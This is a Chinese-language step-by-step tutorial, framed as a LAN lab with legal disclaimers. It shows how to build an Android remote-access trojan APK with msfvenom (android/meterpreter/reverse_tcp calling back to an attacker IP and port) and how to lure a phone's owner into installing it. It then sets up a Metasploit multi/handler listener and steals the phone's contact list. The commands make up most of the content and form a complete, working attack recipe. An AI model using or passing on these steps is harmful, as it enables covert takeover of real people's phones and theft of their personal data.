声明：本文仅限于技术讨论与学习，严禁用于非法途径，否则后果自负。

原理：借助kali的Metasploit渗透测试框架生成远程木马，然后感染局域网内Android手机，从而实现对被渗透手机数据的读取等。

实验前准备：

　　　　kali虚拟机：192.168.0.102（攻击机）

　　　　win10中间机：用于将kali生成的远程木马发送到Android手机中。

　　　　Android手机:192.168.0.105（靶机）

　　　　Xshell4：用于将在kali上生成的远程木马从kali中导到win10中间机中。

实验过程：

一、kali生成远程木马

　　1.利用msfvenom生成木马病毒，payload选择android/meterpreter/reverse_tcp，后接kali虚拟机的名字和端口：

　　　　msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=8888 R > /root/android.apk

 　2.　检查文件的生成：

二、木马传送

　　利用win10中的Xshell4将kali中生成的android.apk传送到指定路径（本实验指定路径为F:\)，再诱导Android手机（靶机）安装。

　　1.用Xshell4连接kali虚拟机并将android.apk传送到指定路径：

 　　2.将F盘下的android.apk诱导发送到目标靶机上安装。

　　　　目标靶机上安装完成木马后会出现如下图标：

 三、目标攻击

　　1.msf监听

　　　　kali虚拟机终端依次执行以下命令：

　　　　　　msfconsole　　　　　　　　//启动msfconsole

　　　　　　use exploit/multi/handler　　//加载模块

　　　　　　set payload android/meterpreter/reverse_tcp　　//选择payload

　　　　　　set LHOST 192.168.0.102

　　　　　　set LPORT 8888

　　　　　　exploit　　　　　　　　　　//开始执行漏洞，开始监听，等待目标上线 

 　　在目标手机上点一下木马文件（没有页面），则可成功建立攻击会话：

 　　查看上述文件：

上述实验演示的是窃取目标靶机通讯录，如果对其他命令感兴趣的话可通过help命令自行尝试。

提醒：本实验仅用于技术讨论与学习，严禁用于非法途径，否则后果自负。